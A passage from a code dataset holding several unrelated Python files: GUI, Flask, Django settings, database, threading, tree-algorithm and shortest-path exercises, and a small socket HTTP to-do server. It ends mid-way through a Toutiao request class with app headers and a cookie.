self.pesquisa_tipo_evento = PesquisaTipoEvento(parent=None)\r\n        self.pesquisa_tipo_evento.show()\r\n\r\n    @Slot()\r\n    def exibe_pesquisa_evento(self):\r\n        self.pesquisa_evento = PesquisaEvento(parent=None)\r\n        self.pesquisa_evento.show()\r\n\r\n    @Slot()\r\n    def exibe_pesquisa_preco(self):\r\n        self.pesquisa_preco = PesquisaPreco(parent=None)\r\n        self.pesquisa_preco.show()\r\n\r\n    @Slot()\r\n    def exibe_pesquisa_apresentacao(self):\r\n        self.pesquisa_apresentacao = PesquisaApresentacao(parent=None)\r\n        self.pesquisa_apresentacao.show()\r\n\r\n    @Slot()\r\n    def exibe_pesquisa_tipo_despesa(self):\r\n        self.pesquisa_tipo_despesa = PesquisaTipoDespesa(parent=None)\r\n        self.pesquisa_tipo_despesa.show()\r\n\r\n    @Slot()\r\n    def exibe_pesquisa_despesa(self):\r\n        self.pesquisa_despesa = PesquisaDespesa(parent=None)\r\n        self.pesquisa_despesa.show()\r\n\r\n    @Slot()\r\n    def exibe_pesquisa_receita(self):\r\n        self.pesquisa_receita = PesquisaReceita(parent=None)\r\n        self.pesquisa_receita.show()\r\n","repo_name":"teiGustavo/eventos-pyside","sub_path":"UIs/MainMenu.py","file_name":"MainMenu.py","file_ext":"py","file_size_in_byte":3335,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"2329538477","text":"import os\n\nfrom config import UPLOAD_FOLDER\nfrom mimetypes import guess_extension\n\nclass ProfilePhoto:\n    def __init__(self, file, user_id):\n        self.file = file\n        self.user_id = user_id\n    \n    def file_rename(self):\n        ALLOWED_MIME_TYPES = ['image/jpeg', 'image/png', 'image/gif']\n        mime_type = self.file.mimetype\n        \n        if mime_type not in ALLOWED_MIME_TYPES:\n            raise ValueError('The image file format must be .jpeg, .png or .gif')\n        ext = guess_extension(mime_type)\n        return f\"photo-userId_{self.user_id}{ext}\"\n\n    def save_file(self):\n        filename = self.file_rename()\n        self.file.save(os.path.join(UPLOAD_FOLDER, filename))\n        \n        return filename\n","repo_name":"VitorValandro/Vitae","sub_path":"server/utils/file.py","file_name":"file.py","file_ext":"py","file_size_in_byte":677,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"7159099913","text":"import heapq\nINF = int(10e9)\ntest = int(input())\n\ndef dijkstra(start, distance, graph):\n    queue = []\n    distance[start] = 0\n    heapq.heappush(queue, (distance[start], start))\n    while queue:\n        dis, now = heapq.heappop(queue)\n        if distance[now] < dis:\n            continue\n        \n        for i in graph[now]:\n            cost = distance[now] + i[0]\n            if distance[i[1]] > cost:\n                distance[i[1]] = cost\n                heapq.heappush(queue, (cost, i[1]))\n    \n    \nfor _ in range(test):\n    n, d, c = map(int, input().split()) # n: number of computers, d: number of dependencies, c: the hacked computer\n    graph = [[] for _ in range(n+1)]\n    distance = [INF] * (n+1)\n    for _ in range(d):\n        com1, com2, time = map(int, input().split())\n        graph[com2].append([time, com1])\n    dijkstra(c, distance, graph)\n    hackedcom = []\n    for i in range(len(distance)):\n        if distance[i] != INF:\n            hackedcom.append(distance[i])\n    \n    print(len(hackedcom), end=' ') # total number of infected computers\n    print(max(hackedcom)) # time until the last computer is infected","repo_name":"rhkdguskim/Study","sub_path":"알고리즘/이것이코딩테스트다스터디/다익스트라/해킹.py","file_name":"해킹.py","file_ext":"py","file_size_in_byte":1143,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"6499417766","text":"import contextlib\nimport os\nimport sys\n\n# Build paths inside the project like this: os.path.join(BASE_DIR, ...)\nfrom pathlib import Path\n\nBASE_DIR = 
Path(__file__).parent.parent\nsys.path.insert(0, os.path.join(BASE_DIR, \"apps\"))\nsys.path.insert(0, os.path.join(BASE_DIR.parent, \"api\"))\nsys.path.insert(0, os.path.join(BASE_DIR.parent, \"api/endpoints/v1\"))\n\n# SECURITY WARNING: keep the secret key used in production secret!\nSECRET_KEY = os.environ.get(\"SECRET_KEY\", None)\n\n# SECURITY WARNING: don't run with debug turned on in production!\nDEBUG = True\n\nALLOWED_HOSTS = [\"*\"]\n\n\n# Application definition\n\nINSTALLED_APPS = [\n \"django.contrib.auth\",\n \"django.contrib.contenttypes\",\n \"django.contrib.staticfiles\",\n \"apiblueprint_view\",\n \"pipeline\",\n \"dc_design_system\",\n \"dc_utils\",\n]\nPROJECT_APPS = [\"api_docs.v1\"]\nINSTALLED_APPS += PROJECT_APPS\n\nMIDDLEWARE = [\n \"django.middleware.security.SecurityMiddleware\",\n \"whitenoise.middleware.WhiteNoiseMiddleware\",\n \"django.contrib.sessions.middleware.SessionMiddleware\",\n \"django.middleware.common.CommonMiddleware\",\n \"django.middleware.csrf.CsrfViewMiddleware\",\n \"django.contrib.auth.middleware.AuthenticationMiddleware\",\n \"django.contrib.messages.middleware.MessageMiddleware\",\n \"django.middleware.clickjacking.XFrameOptionsMiddleware\",\n]\n\nROOT_URLCONF = \"frontend.urls\"\n\nTEMPLATES = [\n {\n \"BACKEND\": \"django.template.backends.django.DjangoTemplates\",\n \"DIRS\": [os.path.join(BASE_DIR, \"templates\")],\n \"APP_DIRS\": True,\n \"OPTIONS\": {\n \"context_processors\": [\n \"django.template.context_processors.debug\",\n \"django.template.context_processors.request\",\n \"django.contrib.auth.context_processors.auth\",\n \"django.contrib.messages.context_processors.messages\",\n ]\n },\n }\n]\n\nWSGI_APPLICATION = \"frontend.wsgi.application\"\n\n\n# Database\n# https://docs.djangoproject.com/en/1.11/ref/settings/#databases\n\nDATABASES = {\"default\": {\"ENGINE\": \"django.db.backends.sqlite3\"}}\n\n\n# Password validation\n# https://docs.djangoproject.com/en/1.11/ref/settings/#auth-password-validators\n\nAUTH_PASSWORD_VALIDATORS = [\n {\n \"NAME\": \"django.contrib.auth.password_validation.UserAttributeSimilarityValidator\"\n },\n {\"NAME\": \"django.contrib.auth.password_validation.MinimumLengthValidator\"},\n {\"NAME\": \"django.contrib.auth.password_validation.CommonPasswordValidator\"},\n {\n \"NAME\": \"django.contrib.auth.password_validation.NumericPasswordValidator\"\n },\n]\n\n\n# Internationalization\n# https://docs.djangoproject.com/en/1.11/topics/i18n/\n\nLANGUAGE_CODE = \"en-us\"\n\nTIME_ZONE = \"UTC\"\n\nUSE_I18N = True\n\nUSE_L10N = True\n\nUSE_TZ = True\n\n\n# Static files (CSS, JavaScript, Images)\n# https://docs.djangoproject.com/en/1.11/howto/static-files/\n\nfrom dc_utils.settings.pipeline import * # noqa\nfrom dc_utils.settings.pipeline import get_pipeline_settings # noqa\n\nPIPELINE = get_pipeline_settings(extra_css=[\"scss/styles.scss\"])\n\nimport dc_design_system # noqa\n\nPIPELINE[\"SASS_ARGUMENTS\"] += (\n \" -I \" + dc_design_system.DC_SYSTEM_PATH + \"/system\"\n)\n\nSASS_INCLUDE_PATHS = [dc_design_system.DC_SYSTEM_PATH + \"/system\"]\nSTATIC_ROOT = os.path.join(BASE_DIR, \"static_files\")\nSTATIC_URL = \"/static/\"\nSTATICFILES_DIRS = (os.path.join(BASE_DIR, \"assets\"),)\n\nSITE_TITLE = \"Democracy Club Developers\"\n\n\n# CorsMiddleware config\nCORS_ORIGIN_ALLOW_ALL = True\nCORS_URLS_REGEX = r\"^/api/.*$\"\nCORS_ALLOW_METHODS = (\"GET\", \"OPTIONS\")\n\nfrom .constants import * # noqa\n\n\nsentry_dsn = os.environ.get(\"SENTRY_DSN\", None)\nif sentry_dsn:\n import sentry_sdk\n from 
sentry_sdk.integrations.django import DjangoIntegration\n\n    sentry_sdk.init(\n        dsn=sentry_dsn,\n        integrations=[DjangoIntegration()],\n        traces_sample_rate=0,\n        send_default_pii=False,\n    )\n\n\n# Lambda: https://docs.aws.amazon.com/lambda/latest/dg/configuration-envvars.html#configuration-envvars-runtime\n# CircleCI: https://circleci.com/docs/2.0/env-vars/#built-in-environment-variables\n# Make: https://docs.oracle.com/cd/E19504-01/802-5880/makeattapp-21/index.html\ndef is_local_dev():\n    vars_to_check = [\"AWS_LAMBDA_FUNCTION_NAME\", \"CI\", \"MAKEFLAGS\"]\n    return not any(ev in os.environ for ev in vars_to_check)\n\n\n# .local.py overrides all the common settings.\nif is_local_dev():\n    print(\n        \"Found nothing to indicate this is NOT a local development environment; including settings/local.py\"\n    )  # FIXME: log?\n    with contextlib.suppress(ImportError):\n        from .local import *  # noqa\n","repo_name":"DemocracyClub/aggregator-api","sub_path":"frontend/settings/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":4580,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"4598604517","text":"def sokhonggiam(n):\n\tfor i in range(len(n)-1):\n\t\tif n[i+1] < n[i]:\n\t\t\treturn 0\n\treturn 1\n\ntest = int(input())\nwhile (test>0) :\n\tn = input()\n\tcheck = sokhonggiam(n)\n\tif check==1: print(\"YES\")\n\telse: print(\"NO\")\n\ttest -= 1","repo_name":"HongDuy119/CODE_PYTHON","sub_path":"PY01015 - SỐ KHÔNG GIẢM.py","file_name":"PY01015 - SỐ KHÔNG GIẢM.py","file_ext":"py","file_size_in_byte":220,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"28799577023","text":"from shutil import copyfile\nfrom shutil import copytree\nfrom time import sleep\n\nfrom constants import source_config_folder_list, source_config_file_list\nimport sys\n\npath_to_be_restored_folder = sys.argv[1]\nprint(\"Path to the target snapshot to be restored: \" + path_to_be_restored_folder)\n\n# whole folder\nwith open(source_config_folder_list) as file:\n    lines = file.readlines()\n    for original_src in lines:\n        original_src = original_src.rstrip()\n        restore_from = path_to_be_restored_folder + \"/\" + original_src.split(\"/\")[-1]\n\n        print(\"restore config snapshot. from: \" + restore_from + \", to: \" + original_src)\n        # supposed to overwrite existing files, so dirs_exist_ok is set to True\n        copytree(restore_from, original_src, dirs_exist_ok=True)\n\n\n# single files\nwith open(source_config_file_list) as file:\n    lines = file.readlines()\n    for original_src in lines:\n        original_src = original_src.rstrip()\n        restore_from = path_to_be_restored_folder + \"/\" + original_src.split(\"/\")[-1]\n\n        print(\"restore config snapshot. 
from: \" + restore_from + \", to: \" + original_src)\n copyfile(restore_from, original_src)\n","repo_name":"keypointt/ConfigSnapshot","sub_path":"restore_snapshot_config.py","file_name":"restore_snapshot_config.py","file_ext":"py","file_size_in_byte":1142,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"23890429162","text":"import logging\nimport sys\nfrom typing import Callable, Optional\n\nimport sqlalchemy\n\nfrom .exceptions import DBNotPreparedError\n\n\nlogger = logging.getLogger('database')\n\n_DEFAULT_CONNECTION_PARAMS = {}\n\ntry:\n import contextvars\n CURRENT_DATABASE_VAR = contextvars.ContextVar(\"dysql_current_database\", default='')\nexcept ImportError:\n CURRENT_DATABASE_VAR = None\n\n\ndef set_database_init_hook(hook_method: Callable[[Optional[str], sqlalchemy.engine.Engine], None]) -> None:\n \"\"\"\n Sets an initialization hook whenever a new database is initialized. This method will receive the database name\n (may be none) and the sqlalchemy engine as parameters.\n\n :param hook_method: the hook method\n \"\"\"\n Database.set_init_hook(hook_method)\n\n\ndef is_set_current_database_supported() -> bool:\n \"\"\"\n Determines if the set_current_database method is available on this python runtime.\n :return: True if available, False otherwise\n \"\"\"\n return bool(CURRENT_DATABASE_VAR)\n\n\ndef set_current_database(database: str) -> None:\n \"\"\"\n Sets the current database, may be used for multitenancy. This is only supported on Python 3.7+. This uses\n contextvars internally to set the name for the current async context.\n :param database: the database name to use for this async context\n \"\"\"\n if not CURRENT_DATABASE_VAR:\n raise DBNotPreparedError(\n f'Cannot set the current database on Python \"{sys.version}\", please upgrade your Python version'\n )\n CURRENT_DATABASE_VAR.set(database)\n logger.debug(f'Set current database to {database}')\n\n\ndef reset_current_database() -> None:\n \"\"\"\n Helper method to reset the current database to the default. Internally, this calls `set_current_database` with\n an empty string.\n \"\"\"\n set_current_database('')\n\n\ndef _get_current_database() -> str:\n \"\"\"\n The current database name, using contextvars (if on python 3.7+) or the default database name.\n :return: The current database name\n \"\"\"\n database: Optional[str] = None\n if CURRENT_DATABASE_VAR:\n database = CURRENT_DATABASE_VAR.get()\n if not database:\n database = _DEFAULT_CONNECTION_PARAMS.get('database')\n return database\n\n\ndef _validate_param(name: str, value: str) -> None:\n if not value:\n raise DBNotPreparedError(f'Database parameter \"{name}\" is not set or empty and is required')\n\n\ndef set_default_connection_parameters(\n host: str,\n user: str,\n password: str,\n database: str,\n port: int = 3306,\n pool_size: int = 10,\n pool_recycle: int = 3600,\n echo_queries: bool = False,\n charset: str = 'utf8'\n): # pylint: disable=too-many-arguments,unused-argument\n \"\"\"\n Initializes the parameters to use when connecting to the database. This is a subset of the parameters\n used by sqlalchemy. 
These may be overridden by parameters provided in the QueryData, hence the \"default\".\n\n    :param host: the db host to try to connect to\n    :param user: user to connect to the database with\n    :param password: password for given user\n    :param database: database to connect to\n    :param port: the port to connect to (default 3306)\n    :param pool_size: number of connections to maintain in the connection pool (default 10)\n    :param pool_recycle: amount of time to wait between resetting the connections\n                         in the pool (default 3600)\n    :param echo_queries: this tells sqlalchemy to print the queries when set to True (default false)\n    :param charset: the charset for the sql engine to initialize with. (default utf8)\n    :exception DBNotPreparedError: happens when required parameters are missing\n    \"\"\"\n    _validate_param('host', host)\n    _validate_param('user', user)\n    _validate_param('password', password)\n    _validate_param('database', database)\n\n    _DEFAULT_CONNECTION_PARAMS.update(locals())\n\n\nclass Database:\n    # pylint: disable=too-few-public-methods\n\n    def __init__(self, database: Optional[str]) -> None:\n        self.database = database\n        # Engine is lazy-initialized\n        self._engine: Optional[sqlalchemy.engine.Engine] = None\n\n    @classmethod\n    def set_init_hook(\n        cls,\n        hook_method: Callable[[Optional[str], sqlalchemy.engine.Engine], None],\n    ) -> None:\n        cls.hook_method = hook_method\n\n    @property\n    def engine(self) -> sqlalchemy.engine.Engine:\n        if not self._engine:\n            user = _DEFAULT_CONNECTION_PARAMS.get('user')\n            password = _DEFAULT_CONNECTION_PARAMS.get('password')\n            host = _DEFAULT_CONNECTION_PARAMS.get('host')\n            port = _DEFAULT_CONNECTION_PARAMS.get('port')\n            charset = _DEFAULT_CONNECTION_PARAMS.get('charset')\n\n            url = f'mysql+mysqlconnector://{user}:{password}@{host}:{port}/{self.database}?charset={charset}'\n            self._engine = sqlalchemy.create_engine(\n                url,\n                pool_recycle=_DEFAULT_CONNECTION_PARAMS.get('pool_recycle'),\n                pool_size=_DEFAULT_CONNECTION_PARAMS.get('pool_size'),\n                echo=_DEFAULT_CONNECTION_PARAMS.get('echo_queries'),\n                pool_pre_ping=True,\n            )\n            hook_method: Optional[Callable[[Optional[str], sqlalchemy.engine.Engine], None]] = \\\n                getattr(self.__class__, 'hook_method', None)\n            if hook_method:\n                hook_method(self.database, self._engine)\n\n        return self._engine\n\n\nclass DatabaseContainer(dict):\n    \"\"\"\n    Implementation of a dictionary that always provides a Database class instance, even if the key is missing.\n    \"\"\"\n    def __getitem__(self, database: Optional[str]) -> Database:\n        \"\"\"\n        Override getitem to always return an instance of a database, which includes a lazy-initialized engine.\n        This also ensures that the database parameters have been initialized before attempting to retrieve a database.\n        :param database: the database name (may be null for the default database)\n        :return: a database instance\n        :raises DBNotPreparedError: when set_default_connection_parameters has not yet been called\n        \"\"\"\n        if not _DEFAULT_CONNECTION_PARAMS:\n            raise DBNotPreparedError(\n                'Unable to connect to a database, set_default_connection_parameters must first be called'\n            )\n\n        if not super().__contains__(database):\n            super().__setitem__(database, Database(database))\n        return super().__getitem__(database)\n\n    @property\n    def current_database(self) -> Database:\n        \"\"\"\n        The current database instance, retrieved using contextvars (if python 3.7+) or the default database.\n        \"\"\"\n        # pylint: disable=unnecessary-dunder-call\n        return self.__getitem__(_get_current_database())\n\n\nclass 
DatabaseContainerSingleton(DatabaseContainer):\n    \"\"\"\n    All instantiations of this class will result in the same instance every time due to the override of\n    the __new__ method.\n    \"\"\"\n    def __new__(cls, *args, **kwargs) -> 'DatabaseContainer':\n        instance = cls.__dict__.get(\"__instance__\")\n        if instance is not None:\n            return instance\n        cls.__instance__ = instance = DatabaseContainer.__new__(cls)\n        instance.__init__(*args, **kwargs)\n        return instance\n","repo_name":"adobe/dy-sql","sub_path":"dysql/databases.py","file_name":"databases.py","file_ext":"py","file_size_in_byte":7335,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"48"} +{"seq_id":"14096120417","text":"from collections import deque\nclass TreeNode:\n    def __init__(self, val=0, left=None, right=None):\n        self.val = val\n        self.left = left\n        self.right = right\n\n    def create_tree(self, levelorder):\n        if not levelorder:\n            return None\n        root_value = levelorder.pop(0)\n        root = TreeNode(root_value) if root_value is not None else None\n        queue = deque([root])\n\n        while levelorder:\n            current_node = queue.popleft()\n\n            # for each node we will have two children in level order list\n            left_value = levelorder.pop(0)\n            if left_value is not None:\n                left_node = TreeNode(left_value)\n                current_node.left = left_node\n                queue.append(left_node)\n\n            if levelorder:  # if there are still values left\n                right_value = levelorder.pop(0)\n                if right_value is not None:\n                    right_node = TreeNode(right_value)\n                    current_node.right = right_node\n                    queue.append(right_node)\n\n        return root\n    \n    def __repr__(self, level=0):\n        ret = \"\\t\"*level + repr(self.val) + \"\\n\"\n        if self.left:\n            ret += self.left.__repr__(level + 1)\n        if self.right:\n            ret += self.right.__repr__(level + 1)\n        return ret\n\ndef build_tree(nodes, i, n):\n    root = None\n    if (i < n) and nodes[i] is not None:\n        root = TreeNode(nodes[i])\n        root.left = build_tree(nodes, 2*i + 1, n)\n        root.right = build_tree(nodes, 2*i + 2, n)\n    return root\n\n# Recursive solution\nclass SolutionRecursive:\n    def longestZigZag(self, root):\n        self.max_length = 0\n        self.dfs(root)\n        return self.max_length\n\n    def dfs(self, node):\n        if node is None:\n            return [-1, -1]\n\n        left = self.dfs(node.left)\n        right = self.dfs(node.right)\n\n        self.max_length = max(self.max_length, left[1] + 1, right[0] + 1)\n\n        return [left[1] + 1, right[0] + 1]\n\n# Iterative solution 1\nclass SolutionIterative1:\n    def longestZigZag(self, root):\n        stack = [(root, False, 0)]\n        max_length = 0\n\n        while stack:\n            node, is_left, length = stack.pop()\n            max_length = max(max_length, length)\n            \n            if node.left:\n                stack.append((node.left, False, length + 1 if is_left else 1))\n            if node.right:\n                stack.append((node.right, True, length + 1 if not is_left else 1))\n\n        return max_length\n\n# Iterative solution 2\nclass SolutionIterative2:\n    def longestZigZag(self, root):\n        stack = [(root, 's', 0)]\n        maxsum = 0\n        while stack:\n            node, dir, sum = stack.pop()\n            lsum = sum\n            rsum = sum\n            if node:\n                if node.right:\n                    if dir == 's' or dir == 'l':\n                        rsum = sum + 1\n                    else: \n                        rsum = 1\n                    newDir = 'r'\n                    stack.append((node.right, newDir, rsum))\n                if node.left:\n                    if dir == 's' or dir == 'r':\n                        lsum = sum + 1\n                    else: \n                        lsum = 1\n                    newDir = 'l'\n                    stack.append((node.left, newDir, lsum))\n                maxsum = max(maxsum, lsum, rsum, sum)\n        return maxsum\n    \nclass Solution:\n    def find_path_sum(self, root, target):\n        self.cache = {0: 1} \n        self.count = 0\n        self.helper(root, target, 0)\n        return self.count\n    def helper(self, root, target, sum):\n        if root is 
None:\n            return\n        \n        sum += root.val\n\n        self.count += self.cache.get(sum - target, 0)\n        self.cache[sum] = self.cache.get(sum, 0) + 1\n\n        self.helper(root.left, target, sum)\n        self.helper(root.right, target, sum)\n\n        if self.cache[sum] == 1:\n            del self.cache[sum]  # Completely remove from cache if count becomes 0\n        else:\n            self.cache[sum] -= 1\n\n\nif __name__ == \"__main__\":\n    nodes = [1, 2, 3, 4, 5, 6, 7, 8, 9]\n    root = build_tree(nodes, 0, len(nodes))\n    \n    recursive_solution = SolutionRecursive().longestZigZag(root)\n    iterative_solution_1 = SolutionIterative1().longestZigZag(root)\n    iterative_solution_2 = SolutionIterative2().longestZigZag(root)\n\n    print(f\"Recursive Solution: {recursive_solution}\")\n    print(f\"Iterative Solution 1: {iterative_solution_1}\")\n    print(f\"Iterative Solution 2: {iterative_solution_2}\")\n    root = TreeNode().create_tree([10, 5, -3, 3, 2, None, 11, 3, -2, None, 1])\n    targetSum = 8\n    print(Solution().find_path_sum(root, 8))\n","repo_name":"dvc0310/Interview-prep-stuff","sub_path":"anki/tree_7_19_23.py","file_name":"tree_7_19_23.py","file_ext":"py","file_size_in_byte":4714,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"27606204250","text":"# -*- coding: utf-8 -*-\r\n# @Time    : 2018/9/21 17:37\r\n# @Author  : fovegage\r\n# @Email   : fovegage@gmail.com\r\n# @File    : thread_syn.py\r\n# @Software: PyCharm\r\n\r\nimport threading\r\n\r\n\r\n# To achieve synchronization, each thread acquires one lock and releases the next\r\nclass My_thread_1(threading.Thread):\r\n    def run(self):\r\n        while True:\r\n            if l1.acquire():\r\n                print(\"task1\")\r\n                l2.release()\r\n\r\n\r\nclass My_thread_2(threading.Thread):\r\n    def run(self):\r\n        while True:\r\n            if l2.acquire():\r\n                print(\"task2\")\r\n                l3.release()\r\n\r\n\r\nclass My_thread_3(threading.Thread):\r\n    def run(self):\r\n        while True:\r\n            if l3.acquire():\r\n                print(\"task3\")\r\n                l1.release()\r\n\r\n\r\nif __name__ == '__main__':\r\n    l1 = threading.Lock()\r\n    l2 = threading.Lock()\r\n    l2.acquire()\r\n    l3 = threading.Lock()\r\n    l3.acquire()\r\n\r\n    t1 = My_thread_1()\r\n    t2 = My_thread_2()\r\n    t3 = My_thread_3()\r\n    t1.start()\r\n    t2.start()\r\n    t3.start()\r\n","repo_name":"fovegage/learn-python","sub_path":"Python编程/系统编程/线程/thread_syn.py","file_name":"thread_syn.py","file_ext":"py","file_size_in_byte":1021,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"48"} +{"seq_id":"23144215176","text":"import string\nimport random\n\nfrom data.VehicleData import VEHICLE_DATA\n\n\nclass VehicleInfo:\n    brand: str\n    electric: bool\n    catalogue_price: int\n\n    def __init__(self, brand, electric, catalogue_price):\n        self.brand = brand\n        self.electric = electric\n        self.catalogue_price = catalogue_price\n\n    def determinate_tax_percentage(self):\n        if self.electric:\n            tax_percentage = 0.02\n        else:\n            tax_percentage = 0.05\n\n        return tax_percentage\n\n    def compute_tax(self):\n        return self.determinate_tax_percentage() * self.catalogue_price\n\n    def print(self):\n        print(f\"Brand: {self.brand}\")\n        print(f\"Electric: {self.electric}\")\n        print(f\"Payable tax: {self.compute_tax()}\")\n\n\nclass Vehicle:\n    id_: str\n    license_plate: str\n    info: VehicleInfo\n\n    def __init__(self, id_, license_plate, info):\n        self.id_ = id_\n        self.license_plate = license_plate\n        self.info = info\n\n    def print(self):\n        print(f\"Id: {self.id_}\")\n        print(f\"License plate: {self.license_plate}\")\n        self.info.print()\n\n\nclass VehicleRegistry:\n\n    def __init__(self):\n        self.vehicle_info = {}\n\n        for vehicle in VEHICLE_DATA:\n            
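# Each VEHICLE_DATA entry is assumed to be a dict with brand, electric and catalogue_price keys, matching add_vehicle_info's signature.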
self.add_vehicle_info(**vehicle)\n\n    def add_vehicle_info(self, brand, electric, catalogue_price):\n        self.vehicle_info[brand] = VehicleInfo(brand, electric, catalogue_price)\n\n    @staticmethod\n    def generate_vehicle_id(length):\n        return ''.join(random.choices(string.ascii_uppercase, k=length))\n\n    @staticmethod\n    def generate_vehicle_license(id_):\n        return f\"{id_[:2]}-{''.join(random.choices(string.digits, k=2))}-{''.join(random.choices(string.ascii_uppercase, k=2))}\"\n\n    def create_vehicle(self, brand):\n        id_ = self.generate_vehicle_id(12)\n        license_plate = self.generate_vehicle_license(id_)\n\n        return Vehicle(id_, license_plate, self.vehicle_info[brand])\n\n\nclass Application:\n\n    @staticmethod\n    def register_vehicle(brand: str):\n        # create a registry instance\n        registry = VehicleRegistry()\n\n        vehicle = registry.create_vehicle(brand)\n\n        # print out the vehicle information\n        vehicle.print()\n\n\nif __name__ == '__main__':\n    app = Application()\n    app.register_vehicle(\"Volkswagen ID3\")\n","repo_name":"aviz92/PythonCourses","sub_path":"PythonCourses/BetterPython/N1_coupling_and_cohesion/coupling-cohesion-after.py","file_name":"coupling-cohesion-after.py","file_ext":"py","file_size_in_byte":2315,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"11204303020","text":"import socket\n\n\nclass NoHandlerError(Exception):\n    pass\n\n\nclass Request:\n    pass\n\n\nclass Handler:\n    def can_handle(self, request):\n        return False\n\n    def handle(self, request):\n        raise RuntimeError(\"abstract\")\n\n\nclass Server:\n    def __init__(self, host='127.0.0.1', port=80):\n        self.s = socket.socket()\n        server_addr = host, port\n        self.s.bind(server_addr)\n        self.handlers = []\n\n    def add_handler(self, handler):\n        self.handlers.append(handler)\n\n    def get(self, path):\n        def decorator(f):\n            class DynamicHandler(Handler):\n                def can_handle(self, request):\n                    return request.method == 'GET' and request.path == path\n                def handle(self, request):\n                    return f(request)\n            self.handlers.append(DynamicHandler())\n            return f\n        return decorator\n\n    def post(self, path):\n        def decorator(f):\n            class DynamicHandler(Handler):\n                def can_handle(self, request):\n                    return request.method == 'POST' and request.path == path\n                def handle(self, request):\n                    return f(request)\n            self.handlers.append(DynamicHandler())\n            return f\n        return decorator\n\n    def any(self):\n        def decorator(f):\n            class DynamicHandler(Handler):\n                def can_handle(self, request):\n                    return True\n                def handle(self, request):\n                    return f(request)\n            self.handlers.append(DynamicHandler())\n            return f\n        return decorator\n\n    def serve_forever(self):\n        self.s.listen()\n        while True:\n            s2, client_addr = self.s.accept()\n            try:\n                self.handle_client(s2)\n            except:\n                try:\n                    s2.send(b'HTTP/1.0 500 Internal Server Error\\r\\n\\r\\n')\n                except:\n                    pass # the socket has died, do nothing\n            finally:\n                s2.close()\n\n    def handle_client(self, socket):\n        client_handler = ClientHandler(socket, self.handlers)\n        request = client_handler.parse_request()\n        response = client_handler.handle_request(request)\n        client_handler.send_response(response)\n\n\nclass ClientHandler:\n    def __init__(self, socket, handlers):\n        self.socket = socket\n        self.handlers = handlers\n\n    def parse_request(self):\n        raw_request = self.socket.recv(2048).decode().splitlines()\n        request = Request()\n        first_line = raw_request.pop(0)\n        # METHOD /path HTTP/version\n        request.method, request.path, request.http_version = first_line.split()\n        request.http_version = 
request.http_version[len('HTTP/'):]\n\n request.headers = self.parse_headers(raw_request)\n request.body = '\\n'.join(raw_request)\n\n return request\n\n def parse_headers(self, raw_request):\n headers = dict()\n while True:\n line = raw_request.pop(0)\n if not line:\n # reached the end of headers\n break\n name, colon, value = line.partition(': ')\n headers[name] = value\n return headers\n\n def handle_request(self, request):\n for handler in self.handlers:\n if handler.can_handle(request):\n return handler.handle(request)\n raise NoHandlerError()\n\n def send_response(self, response):\n if isinstance(response, str):\n code = 200\n body = response\n else:\n code, body = response\n body = body.encode()\n\n code_name = {\n 200: 'OK',\n 201: 'Created',\n 404: 'Not Found'\n }[code]\n\n self.socket.send('HTTP/1.0 {} {}\\r\\n'.format(code, code_name).encode())\n\n self.send_header('Server', 'Simple HTTP server 0.1')\n self.send_header('Content-Type', 'text/html')\n self.send_header('Content-Length', len(body))\n\n self.finish_headers()\n self.socket.send(body)\n\n def send_header(self, name, value):\n self.socket.send('{}: {}\\r\\n'.format(name, value).encode())\n\n def finish_headers(self):\n self.socket.send(b'\\r\\n')\n\n\nclass ToDo:\n def __init__(self):\n self.list = []\n\n def render_html(self):\n res = '
<ul>'\n        for item in self.list:\n            res += '<li>' + item + '</li>'\n        res += '</ul>'\n        return res\n\n    def add(self, item):\n        self.list.append(item)\n\n\nserver = Server(port=8000)\ntodo_list = ToDo()\n\n\n@server.get('/')\ndef root(request):\n    return '''\n    <html>\n    <head>\n    <title>To-do list</title>\n    </head>\n    <body>\n    <h1>Your to-do list:</h1>\n    {}\n    <h2>Add a new item:</h2>\n    <form action=\"/new\" method=\"post\">\n    <input type=\"text\" name=\"name\">\n    <input type=\"submit\" value=\"Add\">\n    </form>\n    </body>\n    </html>\n    
'''.format(todo_list.render_html())\n\n\n@server.post('/new')\ndef new(request):\n    new_todo = request.body.strip()\n    new_todo = new_todo[len(\"name=\"):].replace('+', ' ')\n    todo_list.add(new_todo)\n    return 201, 'Created! Go back to the frontpage.'\n\n\n@server.any()\ndef not_found(request):\n    return 404, 'Not Found'\n\n\nserver.serve_forever()\n","repo_name":"bugaevc/simple-http-server-tutorial","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5538,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"29627464876","text":"import requests\nimport random\n\n\n# Toutiao\nclass TouTiAo:\n\n    headers = {\n        'User-Agent': 'Dalvik/2.1.0 (Linux; U; Android 5.1.1; YAL-AL00 Build/LYZ28N) NewsArticle/7.1.2 okhttp/3.10.0.2',\n        'Cookie': 'install_id=8432019592920; ttreq=1$0c5b0f1439b782077c3ec74acff14f55b057c014; odin_tt=6f79593b5ec6f'\n                  '247e7cf688c767fb74bb6758092f017884bb0d3fb06e0b6b152e621ba932dc0ef7e6215b558d3b492a138c3badb6ef7fb40'\n                  '1529ecac3e747036; history=alrvlFic6pJZXJCTWBmSmZt6KW7ziqlLPUtSc4vvMYhcjtuo9m4%2BAxPLJTFTBofLcZu2v%'\n                  '2BhpYOK4JJoB4q1tmsF%2BgInjEqsbiLe5qEwAJMfAAOZpLlcHyfEJMARcjttUdkemgYn3EnMLWC7Lcp0DE8sl%2Fksgufm%2F'\n                  